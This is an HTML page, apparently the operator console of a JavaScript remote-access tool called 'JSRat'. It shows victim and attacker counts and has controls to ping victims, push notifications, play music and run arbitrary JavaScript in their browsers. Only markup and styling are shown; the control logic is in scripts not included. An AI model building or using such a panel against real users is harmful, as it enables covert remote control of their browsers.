<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
  <title>JSRat Attacker's remote</title>
  <script src="/socket.io/socket.io.js"></script>
  <script defer src="/a/a.js"></script>
  <style>
    * {
      box-sizing: border-box;
    }

    body {
      display: flex;
      flex-direction: column;
      height: 100vh;
      margin: 0;
    }

    #status {
      margin-bottom: 0;
      margin-top:0;
      padding-top: 1em;
      font-weight: 700;
      border-bottom: 2px solid black;
      background-color: rgb(214, 214, 214);
      font-size: 1.3em;
      padding-left: 1em;
    }

    #log {
      overflow: scroll;
      padding-left: 1.5em;
    }

    #remote {
      border-top: 2px solid black;
      margin-top: auto;
      padding: 1em;
      background-color: rgb(214, 214, 214);
      z-index: 10;
    }
  
    #remote>input {
      display: block;
      width: 100%;
    }

    #remote>button {
      display: inline-block;
      background-color: rgb(73, 73, 73);
      color: white;
      border: 2px solid black;
      border-radius: 20px;
      padding: .5em;
      margin: .2em;
    }
  </style>
</head>

<body>
  <div id="status">
    <span id="connection-status">⚠️ Error!</span>,
    <span id="victim-count">0 victims</span>,
    <span id="attacker-count">1 attackers</span>
  </div>

  <ul id="log"></ul>

  <div id="remote">
    <button id="ping">Ping</button>

    <br>

    <label for="notification-text">Notification</label>
    <input type="text" name="" id="notification-text">
    <button type="submit" id="notification-btn">Send notification</button>

    <br>

    <label for="music-url">Play music</label>
    <input type="url" name="" id="music-url">
    <button type="submit" id="music-btn">Send music</button>
    <button type="submit" id="stop-music-btn">Stop music</button>
    <br>
    
    <input type="text" name="" id="javascript">
    <button type="submit" id="run-js-btn">Run Javascript</button>
  </div>
</body>

</html>